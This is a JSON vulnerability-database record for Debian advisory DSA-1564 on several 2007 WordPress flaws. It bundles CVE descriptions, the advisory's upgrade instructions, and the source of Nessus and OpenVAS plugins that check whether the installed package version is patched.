"f77f941acc88d13c46588667cbaedd553b1b546cb65b8a2c38a895faa85612d0", "hashmap": [{"hash": "645c3d4edcceecd0e13424352e17afd4", "key": "title"}, {"hash": "53bf7d59f3ccac38d00309edeb45ba2e", "key": "published"}, {"hash": "ec2587d3b1b37a53f7139b936e10b1fc", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1ab33e67abf2e328df0220da67e931f7", "key": "cpe"}, {"hash": "1f0643149dd5c86751215fd0040675aa", "key": "pluginID"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "a03d359fb0b4e439f50091cee1f89df6", "key": "modified"}, {"hash": "301e270775960584adf6393232c08b09", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "29cffbf9fd05746ee5ed788650bbe28c", "key": "references"}, {"hash": "d76b4835ec756cec54ebd6ca72e939fb", "key": "cvelist"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}, {"hash": "7617dfe9ab86c252b9a061e5b3c8a9b7", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=32126", "id": "DEBIAN_DSA-1564.NASL", "lastseen": "2018-11-11T08:33:53", "modified": "2018-08-09T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "32126", "published": "2008-05-02T00:00:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "http://www.debian.org/security/2008/dsa-1564", "https://security-tracker.debian.org/tracker/CVE-2007-0540"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 6, "lastseen": "2018-11-11T08:33:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "description": "Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-10-28T20:05:48", "references": [{"idList": ["EDB-ID:29522"], "type": "exploitdb"}, {"idList": ["DEBIAN:DSA-1564-1:868BE"], "type": "debian"}, {"idList": ["OPENVAS:60930"], "type": "openvas"}, {"idList": ["OSVDB:39376", "OSVDB:39375", "OSVDB:39371", "OSVDB:33006", "OSVDB:39373", "OSVDB:39377", "OSVDB:39374", "OSVDB:39372"], "type": "osvdb"}, {"idList": ["SECURITYVULNS:VULN:7108"], "type": "securityvulns"}, {"idList": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "type": "cve"}]}, "score": {"modified": "2019-10-28T20:05:48", "value": 6.7, "vector": "NONE"}}, "hash": "729853235781a838e7703aaabfb0560ff8a75517f6fe0f2975d51ccc2df04a1e", "hashmap": [{"hash": "de8f391de5bbaf70203748f3322057c7", "key": "description"}, {"hash": "645c3d4edcceecd0e13424352e17afd4", "key": "title"}, {"hash": "53bf7d59f3ccac38d00309edeb45ba2e", "key": "published"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "79db76c93f584789ccfd9d96e56c3713", "key": "href"}, {"hash": "1ab33e67abf2e328df0220da67e931f7", "key": "cpe"}, {"hash": "1f0643149dd5c86751215fd0040675aa", "key": "pluginID"}, {"hash": "90724ce66b4c4a2345429448439f6388", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "d76b4835ec756cec54ebd6ca72e939fb", "key": "cvelist"}, {"hash": "8c8d842649f801804af566f6d30bb2f8", "key": "reporter"}, {"hash": "dbc5a0c3e1fc4a0b28e0aa44fcc37933", "key": "references"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/32126", "id": "DEBIAN_DSA-1564.NASL", "lastseen": "2019-10-28T20:05:48", "modified": "2019-10-02T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "32126", "published": "2008-05-02T00:00:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "https://security-tracker.debian.org/tracker/CVE-2007-0540", "https://www.debian.org/security/2008/dsa-1564"], "reporter": "This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 10, "lastseen": "2019-10-28T20:05:48"}], "edition": 11, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "1ab33e67abf2e328df0220da67e931f7"}, {"key": "cvelist", "hash": "d76b4835ec756cec54ebd6ca72e939fb"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "description", "hash": "de8f391de5bbaf70203748f3322057c7"}, {"key": "href", "hash": "79db76c93f584789ccfd9d96e56c3713"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "1f0643149dd5c86751215fd0040675aa"}, {"key": "published", "hash": "53bf7d59f3ccac38d00309edeb45ba2e"}, {"key": "references", "hash": "dbc5a0c3e1fc4a0b28e0aa44fcc37933"}, {"key": "reporter", "hash": "8c8d842649f801804af566f6d30bb2f8"}, {"key": "sourceData", "hash": "90724ce66b4c4a2345429448439f6388"}, {"key": "title", "hash": "645c3d4edcceecd0e13424352e17afd4"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "8477e90b0216262a278ca074517905b6174bf14a143322071b7ca0a6c7cfa083", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4154", "CVE-2007-4153", "CVE-2007-0540", "CVE-2007-3639"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1564-1:868BE"]}, {"type": "openvas", "idList": ["OPENVAS:60930"]}, {"type": "osvdb", "idList": ["OSVDB:39372", "OSVDB:39373", "OSVDB:39374", "OSVDB:39377", "OSVDB:39376", "OSVDB:39375", "OSVDB:39371", "OSVDB:33006"]}, {"type": "exploitdb", "idList": ["EDB-ID:29522"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7108"]}], "modified": "2019-11-01T02:21:01"}, "score": {"value": 6.7, "vector": "NONE", "modified": "2019-11-01T02:21:01"}, "vulnersScore": 6.7}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "32126", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:09:00", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in options.php in WordPress 2.2.1 allows remote authenticated administrators to execute arbitrary SQL commands via the page_options parameter to (1) options-general.php, (2) options-writing.php, (3) options-reading.php, (4) options-discussion.php, (5) options-privacy.php, (6) options-permalink.php, (7) options-misc.php, and possibly other unspecified components.", "modified": "2017-07-29T01:32:00", "id": "CVE-2007-4154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4154", "published": "2007-08-03T20:17:00", "title": "CVE-2007-4154", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:00", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.2.1 allow remote authenticated administrators to inject arbitrary web script or HTML via (1) the Options Database Table in the Admin Panel, accessed through options.php; or (2) the opml_url parameter to link-import.php. NOTE: this might not cross privilege boundaries in some configurations, since the Administrator role has the unfiltered_html capability.", "modified": "2017-07-29T01:32:00", "id": "CVE-2007-4153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4153", "published": "2007-08-03T20:17:00", "title": "CVE-2007-4153", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:N/AC:H/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.", "modified": "2018-10-16T16:33:00", "id": "CVE-2007-0540", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0540", "published": "2007-01-29T17:28:00", "title": "CVE-2007-0540", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:09:00", "bulletinFamily": "NVD", "description": "WordPress before 2.2.2 allows remote attackers to redirect visitors to other websites and potentially obtain sensitive information via (1) the _wp_http_referer parameter to wp-pass.php, related to the wp_get_referer function in wp-includes/functions.php; and possibly other vectors related to (2) wp-includes/pluggable.php and (3) the wp_nonce_ays function in wp-includes/functions.php.", "modified": "2018-10-15T21:29:00", "id": "CVE-2007-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3639", "published": "2007-07-10T00:30:00", "title": "CVE-2007-3639", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:21:32", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1564-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMay 01, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : wordpress\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2007-3639 CVE-2007-4153 CVE-2007-4154 CVE-2007-0540\n\nSeveral remote vulnerabilities have been discovered in wordpress,\na weblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2007-3639\n\n Insufficient input sanitising allowed for remote attackers to\n redirect visitors to external websites.\n\nCVE-2007-4153\n\n Multiple cross-site scripting vulnerabilities allowed remote\n authenticated administrators to inject arbitrary web script or HTML.\n\nCVE-2007-4154\n\n SQL injection vulnerability allowed allowed remote authenticated\n administrators to execute arbitrary SQL commands.\n\nCVE-2007-0540\n\n WordPress allows remote attackers to cause a denial of service\n (bandwidth or thread consumption) via pingback service calls with\n a source URI that corresponds to a file with a binary content type,\n which is downloaded even though it cannot contain usable pingback data.\n\n[no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a normal user\n account to access the administrative interface.\n\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.3-1.\n\nWe recommend that you upgrade your wordpress package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz\n Size/MD5 checksum: 520314 e9d5373b3c6413791f864d56b473dd54\n http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch2.diff.gz\n Size/MD5 checksum: 29327 663e0b7c1693ff63715e0253ad5cc036\n http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch2.dsc\n Size/MD5 checksum: 891 2e297f530d472f47b40ba50ea04b1476\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch2_all.deb\n Size/MD5 checksum: 521244 4851fe016749b1b9c819fd8d5785198e\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-05-01T17:00:18", "published": "2008-05-01T17:00:18", "id": "DEBIAN:DSA-1564-1:868BE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00138.html", "title": "[SECURITY] [DSA 1564-1] New wordpress packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:50:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update to wordpress\nannounced via advisory DSA 1564-1.", "modified": "2017-07-07T00:00:00", "published": "2008-05-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=60930", "id": "OPENVAS:60930", "title": "Debian Security Advisory DSA 1564-1 (wordpress)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1564_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1564-1 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in wordpress,\na weblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2007-3639\n\nInsufficient input sanitising allowed for remote attackers to\nredirect visitors to external websites.\n\nCVE-2007-4153\n\nMultiple cross-site scripting vulnerabilities allowed remote\nauthenticated administrators to inject arbitrary web script or HTML.\n\nCVE-2007-4154\n\nSQL injection vulnerability allowed allowed remote authenticated\nadministrators to execute arbitrary SQL commands.\n\nCVE-2007-0540\n\nWordPress allows remote attackers to cause a denial of service\n(bandwidth or thread consumption) via pingback service calls with\na source URI that corresponds to a file with a binary content type,\nwhich is downloaded even though it cannot contain usable pingback data.\n\n[no CVE name yet]\n\nInsufficient input sanitising caused an attacker with a normal user\naccount to access the administrative interface.\n\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.3-1.\n\nWe recommend that you upgrade your wordpress package.\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory DSA 1564-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201564-1\";\n\n\nif(description)\n{\n script_id(60930);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-05-12 19:53:28 +0200 (Mon, 12 May 2008)\");\n script_cve_id(\"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\", \"CVE-2007-0540\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1564-1 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n 